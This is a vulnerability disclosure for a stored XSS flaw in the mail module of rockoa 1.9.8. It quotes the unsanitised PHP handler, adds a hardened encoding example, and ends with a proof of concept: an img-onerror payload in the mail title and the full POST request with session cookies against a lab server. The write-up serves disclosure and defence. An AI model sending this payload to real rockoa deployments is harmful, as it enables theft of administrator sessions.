There is a stored XSS vulnerability in rockoa 1.9.8 that allows JavaScript code execution.

Official website: http://www.rockoa.com/
demo link: http://demo.rockoa.com/
Vulnerability path: webmain/flow/input/mode_emailmAction.php

Lines 34-63:

protected function saveafter($table, $arr, $id, $addbo)
{
    $isturn = (int)$arr['isturn'];
    $type   = (int)$arr['type'];
    if($isturn==1){
        if($type==0){
            $this->flow->savesubmid($arr['receid'], $id, 0,0);
            $this->flow->savesubmid($arr['ccid'], $id, 1,0);
        }
        $this->flow->savesubmid($arr['sendid'], $id, 2,1);
        // outgoing (external) mail
        if($type == 1){
            $emsa = $this->getrecename($arr['receid']);
            if($emsa != ''){
                $ccsa   = $this->getrecename($arr['ccid']);
                $fjar   = m('file')->getfilepath('emailm', $id);
                m('email')->sendemailout($this->adminid, array(
                    'title'     => $arr['title'],
                    'body'      => $arr['content'],
                    'receemail' => $emsa[0],
                    'recename'  => $emsa[1],
                    'ccemail'   => $ccsa[0],
                    'ccname'    => $ccsa[1],
                    'attachpath'=> $fjar[0],
                    'attachname'=> $fjar[1],
                ), 1); // sent directly, not asynchronously
            }
        }
    }
}

When an email is sent, the user-supplied title and content are stored and later rendered without any filtering of dangerous characters. This leads to stored XSS, which can be used to obtain administrator cookies.
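A hardened version of the mail-sending step, added here as an example and not taken from rockoa: it rejects a subject that contains markup before anything is stored, HTML-encodes the stored fields so the inbox view renders them as text, and marks the session cookie HttpOnly so that a later encoding slip cannot hand the cookie to script. Only the request field names ($arr['title'], $arr['content']) come from the code above; every function name below is an assumption made for this illustration.

```php
<?php
// Added example (not rockoa's own code): a hardened version of the
// mail-sending step shown in saveafter(). Only the field names from the
// request ($arr['title'], $arr['content']) come from the original; every
// function name below is an assumption made for this illustration.

// Encode a string for insertion into an HTML text or attribute context.
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// A mail subject is plain text, so any angle bracket in it is treated as an
// injection attempt and the request is rejected before anything is stored.
function isPlainTextSubject(string $title): bool
{
    return preg_match('/[<>]/', $title) === 0;
}

// Build the array handed to the mailer with user-controlled fields neutralised.
// Throws on a subject that contains markup; encodes the body so that it is
// rendered as literal text in the inbox view. A deployment that needs
// rich-text mail would replace encodeForHtml() on the body with an
// allow-list HTML sanitiser (e.g. HTML Purifier) rather than skip the step.
function buildSafeMailPayload(array $arr): array
{
    $title = trim((string)($arr['title'] ?? ''));
    if ($title === '' || !isPlainTextSubject($title)) {
        throw new InvalidArgumentException('subject must be non-empty plain text');
    }

    return array(
        'title' => encodeForHtml($title),
        'body'  => encodeForHtml((string)($arr['content'] ?? '')),
    );
}

// Defence in depth against the cookie theft described above: mark the session
// cookie HttpOnly (and Secure on HTTPS) so script running in the page cannot
// read it even if an encoding bug is introduced later. Call before session_start().
function hardenSessionCookie(bool $https): void
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_samesite', 'Lax');
    if ($https) {
        ini_set('session.cookie_secure', '1');
    }
}

// --- demonstration with constructed inputs ---------------------------------

// 1. The subject from the proof of concept in this write-up: rejected.
$attack = array(
    'title'   => '<img src=x onerror=alert(/xss_test/)>',
    'content' => 'xss_test',
);
try {
    buildSafeMailPayload($attack);
    echo "unexpected: malicious subject accepted\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}

// 2. A benign message whose body contains an ampersand and quotes: accepted,
//    with the body encoded so the inbox view renders it as text, not markup.
$benign = array(
    'title'   => 'Q3 budget review',
    'content' => 'Tom & Jerry said "hi"',
);
$safe = buildSafeMailPayload($benign);
echo $safe['title'] . "\n";
echo $safe['body'] . "\n";
```

The check on the subject is a validation step, not a substitute for output encoding: both fields are still encoded when stored, and the template that renders the inbox should encode again at the point of output, because a value written to the database once may be displayed in several contexts.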

Verification:

user: wangjing
wangjing (user) sends an email to the administrator.
title:

<img src=x onerror=alert(/xss_test/)>

PoC:

POST /xinhu/index.php?a=save&m=mode_emailm|input&d=flow&ajaxbool=true&rnd=897989 HTTP/1.1
Host: 192.168.174.136:829
Content-Length: 193
Accept: */*
Origin: http://192.168.174.136:829
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.174.136:829/xinhu/?a=lu&m=input&d=flow&num=emailm&mid=0&callback=
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gjqr8gpe7g4dlrqjjjmfvl2ja4; deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj
Connection: close

id=0&title=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss_test%2F)%3E&type=0&isturn=1&recename=%E7%AE%A1%E7%90%86%E5%91%98&receid=u1&ccname=&ccid=&content=xss_test&fileid=&sysmodeid=47&sysmodenum=emailm

After the administrator logs in and opens the message, the XSS is triggered.
